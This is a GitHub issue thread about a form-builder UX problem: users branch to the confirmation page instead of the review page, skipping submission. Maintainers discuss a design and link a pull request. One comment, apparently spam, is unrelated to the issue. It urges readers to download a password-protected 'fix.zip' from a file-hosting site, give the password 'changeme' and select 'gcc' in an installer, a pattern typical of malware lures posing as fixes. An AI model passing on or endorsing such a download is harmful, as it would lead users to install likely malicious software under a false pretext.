### ISSUE TITLE
Branching to the review page - UX pain point  

### ISSUE THREAD

**Issue by samsadasivan** [cds-snc/platform-forms-client#4217]
Users often branch to the confirmation page and not the review page. Skipping the "Submit" button. Technically the review page and the confirmation page are the "End" so we shouldn't allow users to branch to that. 

Proposed design in comments

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by samsadasivan** [comment]
<img width="1229" src="https://api.zenhub.com/attachedFiles/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBM21JQmc9PSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--ca669e7742951a481d8cd3fbb6f06b5f553a5c56/image.png" alt="image.png" />

**Comment by samsadasivan** [comment]
- The quick solution would highlight that the Review and Confirmation pages are technically the real exit pages. You can't route to the confirmation page on its own.
- I think we can treat it the same way we treated the "Exit page" pattern
- 

Stacking nodes (not cards within the nodes) will be a new visual pattern we can re-use

**Comment by timarney** [comment]
PR: https://github.com/cds-snc/platform-forms-client/pull/4220

**Comment by timarney** [comment]
Waiting on content for right panel

https://github.com/cds-snc/platform-forms-client/pull/4220#issuecomment-2315935025
